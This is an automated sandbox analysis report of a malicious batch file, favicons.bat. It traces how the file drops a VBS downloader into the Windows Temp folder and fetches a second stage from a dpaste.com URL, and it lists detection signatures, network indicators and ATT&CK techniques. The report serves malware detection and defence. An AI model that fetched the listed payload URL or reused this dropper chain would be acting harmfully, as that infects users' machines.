Edit tour

Windows Analysis Report
favicons.bat

Overview

General Information

Sample name:favicons.bat
Analysis ID:1646806
MD5:50c0f17b4addbc0d98f32424c0b55126
SHA1:a2f08d69be6b8ff0a7619cdf0149f5711aeb3a04
SHA256:26f90d8432f13b001842cf15250cfefc867b74ffd22ee0fc0afce1087e5f9f91
Tags:104-168-7-32batuser-JAMESWT_MHT
Infos:

Detection

Score:88
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected VBS Downloader Generic
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cmd.exe (PID: 6712 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 6844 cmdline: wscript //nologo "C:\Windows\Temp\trickishly.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • timeout.exe (PID: 6864 cmdline: timeout /t 1 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\trickishly.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security

    System Summary

    barindex
    Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 35.173.69.207, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6844, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49692
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: wscript //nologo "C:\Windows\Temp\trickishly.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\trickishly.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6712, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\trickishly.vbs", ProcessId: 6844, ProcessName: wscript.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: wscript //nologo "C:\Windows\Temp\trickishly.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\trickishly.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6712, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\trickishly.vbs", ProcessId: 6844, ProcessName: wscript.exe
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 35.173.69.207, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6844, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49692
    Source: Process startedAuthor: Michael Haag: Data: Command: wscript //nologo "C:\Windows\Temp\trickishly.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\trickishly.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6712, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\trickishly.vbs", ProcessId: 6844, ProcessName: wscript.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: favicons.batVirustotal: Detection: 22%Perma Link
    Source: unknownHTTPS traffic detected: 35.173.69.207:443 -> 192.168.2.8:49692 version: TLS 1.2

    Spreading

    barindex
    Source: Yara matchFile source: C:\Windows\Temp\trickishly.vbs, type: DROPPED

    Networking

    barindex
    Source: C:\Windows\System32\wscript.exeNetwork Connect: 35.173.69.207 443Jump to behavior
    Source: unknownDNS query: name: dpaste.com
    Source: unknownDNS query: name: dpaste.com
    Source: unknownDNS query: name: dpaste.com
    Source: unknownDNS query: name: dpaste.com
    Source: unknownDNS query: name: dpaste.com
    Source: unknownDNS query: name: dpaste.com
    Source: Joe Sandbox ViewIP Address: 35.173.69.207 35.173.69.207
    Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global trafficHTTP traffic detected: GET /9A4PA9CZ5.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: dpaste.comConnection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /9A4PA9CZ5.txt HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: dpaste.comConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: dpaste.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 08:48:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4133Connection: closeVary: Accept-EncodingVary: Cookie, originSet-Cookie: messages=.eJwtyUEKwjAQQNGrjLPpJhgR3NWeQnBRShjipI0mGcmk9foWFP7qv3FE554qxWVWpZnRnMz5YvDOyUtmaAKPN2njA9wElLZ9LVGB9iDQJjU2BqkQJCX5_HBVrgZ6gqVyuHaWvJe1NLVJ5lhsN2R6MVCBP_SWhiMaxGn6AiupMQo:1twdTs:_Av55Wbdsul9IKStwrSRihmIjREDzhEy9nTCZNZLhGA; HttpOnly; Path=/; SameSite=LaxServer: PythonAnywhere
    Source: wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.b-cdn.net/static/pastebin/apple-touch-icon.png
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.b-cdn.net/static/pastebin/css/main.css
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.b-cdn.net/static/pastebin/css/normalize.css
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.b-cdn.net/static/pastebin/css/skeleton.css
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.b-cdn.net/static/pastebin/favicon-16x16.png
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.b-cdn.net/static/pastebin/favicon-32x32.png
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.b-cdn.net/static/pastebin/favicon.ico
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.b-cdn.net/static/pastebin/site.webmanifest
    Source: wscript.exe, 00000002.00000003.1002808390.000001D5F21FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1003966687.000001D5F21FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.com/
    Source: wscript.exe, 00000002.00000002.1003620015.000001D5F20E5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002916579.000001D5F219D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1003966687.000001D5F21FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003075213.000001D5F214A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004094756.000001D5F41F4000.00000004.00000020.00020000.00000000.sdmp, favicons.bat, trickishly.vbs.0.drString found in binary or memory: https://dpaste.com/9A4PA9CZ5.txt
    Source: wscript.exe, 00000002.00000003.1002526300.000001D5F41F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004094756.000001D5F41F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.com/9A4PA9CZ5.txt.
    Source: wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.com/9A4PA9CZ5.txtR
    Source: wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.com/9A4PA9CZ5.txtT;P
    Source: wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dpaste.com/9A4PA9CZ5.txte
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Fira
    Source: wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Fira
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1004072874.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fosstodon.org/
    Source: wscript.exe, 00000002.00000003.1002808390.000001D5F21FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1003966687.000001D5F21FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://media.ethicalads.io/media/client/ethicalads.min.js
    Source: wscript.exe, 00000002.00000002.1003391663.0000009EC7D75000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://unpkg.cd
    Source: wscript.exe, 00000002.00000002.1004049773.000001D5F41E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/htmx.org
    Source: wscript.exe, 00000002.00000003.1003110131.000001D5F3E85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://widget.freshworks.com/widgets/2
    Source: wscript.exe, 00000002.00000003.1002526300.000001D5F41E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002748699.000001D5F41F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002526300.000001D5F41ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://widget.freshworks.com/widgets/22000000180.js
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
    Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
    Source: unknownHTTPS traffic detected: 35.173.69.207:443 -> 192.168.2.8:49692 version: TLS 1.2

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
    Source: classification engineClassification label: mal88.spre.troj.evad.winBAT@6/2@3/1
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
    Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\Temp\trickishly.vbsJump to behavior
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript //nologo "C:\Windows\Temp\trickishly.vbs"
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: favicons.batVirustotal: Detection: 22%
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\favicons.bat" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript //nologo "C:\Windows\Temp\trickishly.vbs"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript //nologo "C:\Windows\Temp\trickishly.vbs"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreakJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

    Persistence and Installation Behavior

    barindex
    Source: C:\Windows\System32\cmd.exeFile created: C:\Windows\Temp\trickishly.vbsJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: wscript.exe, 00000002.00000003.1002808390.000001D5F2217000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.1003966687.000001D5F2217000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
    Source: wscript.exe, 00000002.00000002.1003911551.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002947867.000001D5F21C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1002687222.000001D5F21BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpX

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeNetwork Connect: 35.173.69.207 443Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript //nologo "C:\Windows\Temp\trickishly.vbs"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 1 /nobreakJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information112
    Scripting
    Valid AccountsWindows Management Instrumentation112
    Scripting
    111
    Process Injection
    111
    Process Injection
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Web Service
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    LSASS Memory2
    System Information Discovery
    Remote Desktop ProtocolData from Removable Media1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture14
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
    Ingress Tool Transfer
    Scheduled TransferData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
